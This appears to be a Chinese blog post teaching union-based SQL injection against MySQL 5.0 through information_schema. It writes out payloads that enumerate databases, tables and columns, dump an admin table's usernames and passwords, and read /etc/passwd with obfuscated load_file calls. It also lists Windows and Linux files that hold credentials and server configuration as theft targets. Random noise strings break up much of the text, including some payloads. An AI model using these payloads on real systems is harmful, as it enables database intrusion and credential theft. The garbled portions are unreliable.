mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。



* U# |/ [# e6 [- z4 f# L, Y# r" q% [Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
3 L% n9 V, }. l+ {( g4 M中记录了Mysql中所有
# |. z, u5 ]$ K0 S4 v, W( c- Z存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
9 z% {5 v! _9 u0 j% Q8 w# o9 n: r明。
8 _( w/ t3 f% A  T, x1.得到所有数据库名：
3 K3 E7 s& s0 F7 y, o|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称

# T' E' m, n9 D* C1 |, o+ m|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

$ `" @6 {( A- F4 S; l0 R5 k|COLUMNS ->存储的字段名表
- ~8 q- V# f1 q- |5 Y( b* k; Z+ Q|—字段：TABLE_SCHEMA ->该字段所属数据库名
# q/ a. Y; u# I7 ?5 ~$ e|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称

8 M' ~, o- X3 U#########################################################################
* r3 k: z2 H3 H, e* [: m##
- g0 A) u! P. _8 p% ]& \
0×001 获取系统信息:

union select 1,2,3,4,5,concat
% C# f- q9 W) y/ A  a(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
5 u1 m& y. @5 q# g! G2 G(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
% z) z* l9 v* H
/*
+ f( l& g  k- K- t/ ?
  x# F$ L6 C9 L" }" l+ U9 e; M@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值

*/

8 L% k6 N. a9 L  h" j8 L, _######################################################################
* l, v) W, W% A( T4 e7 n3 ]7 h. m
0×002 获取表名
% U9 n1 b3 X7 G+ I' P
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*

8 T, L/ U/ k! u$ J/*
1 i! K+ i9 t. m. y
- }+ W7 J' ~+ k$ ?0x67617264656e 为当前数据库名
4 }! [6 y' e# _1 z
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
+ O$ p8 E, h3 h/ ^- C/ f7 A  a, i
3 n8 m# c; \* o7 k" ~9 v3 V*/
+ T( l, l, }; U9 i! J
######################################################################
7 u1 g0 O& J" ]: a9 m
  \7 z1 F8 T6 i( k' t+ O" N0×003 获取字段
4 l1 \' v% q$ e6 c: h4 ]1 @& n
3 y0 o4 W0 n) @, Cunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
% D$ Z, D6 S( C. cinformation_schema.columns where table_name=0x61646d696e and
+ Z: u0 a3 V2 z- h- i
5 y5 R. J0 x  {- V$ z8 C
table_schema=0x67617264656e limit 1 /*

/*
; m  ^& _3 ?3 ~; h; ~2 k
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
1 U; |; ?2 |$ T- W: s# M
0x61646d696e ->选择一个表

0x67617264656e ->数据库名

*/

#####################################################################

0×004 获取数据

! l6 [. x* y! b) Qunion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
3 F5 k! _2 h- ~$ G  z! p+ n, b
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
. _( l5 @# l; n- d% q$ M# q
2 i4 A5 B6 v0 f; C1 s: @' G/*
4 ]% Z+ ?0 {8 m
0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据

+ J. f3 \" _. W/ V  ]7 f- X*/




- ]3 ]+ ~! i. \6 e
/ U. C( x$ F6 B0 Q& t顺便添加一些mysql注入时非常有用的一些东西

  {$ h( X$ m) R0 k简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
# |# U+ S7 X& g7 y! v* y* S
! ]5 w: f4 e8 s# h3 R1:system_user() 系统用户名
2:user()        用户名
- U3 ~8 J0 Z; k) d5 @3:current_user()  当前用户名
- q1 R5 `' ~, W5 k* ~- Y; V6 |; J4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
1 k& s  B; k, x# F( }! |8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
/ w9 N6 w4 K9 u7 v) d10@version_compile_os   操作系统  Windows Server 2003,
' d) [+ e" B; z收集的一些路径：
WINDOWS下:
c:/boot.ini          //查看系统版本
3 K, f( p& i& H8 M9 Sc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
" }0 j, ]7 m$ s# ?c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
' S( Z3 F$ J2 y& _c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
5 h6 a" w1 k. v# j6 u$ O3 mc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
1 |2 H) R; i2 Lc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:
/ \& d8 e7 g, G, m/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
# e' {$ t( P% _& @7 f8 K/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
4 @: [# }  u' D' T* l% |# m/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
* S% s( V  l0 z/ C/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
, }* J- S: o" B- D* ~7 x0 r( E/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
9 \  v+ T- a/ ^5 B$ q9 {/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
" H7 S. R: f0 G* M/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
  a1 C/ l, I- r% H, {3 k5 [& v/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
; w1 Q1 [5 Q3 ?1 n  Z  o/ Wreplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
9 R. z2 h2 _6 j  N& T) O上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

7 z! r0 S/ L, K9 a  S# Y% M8 R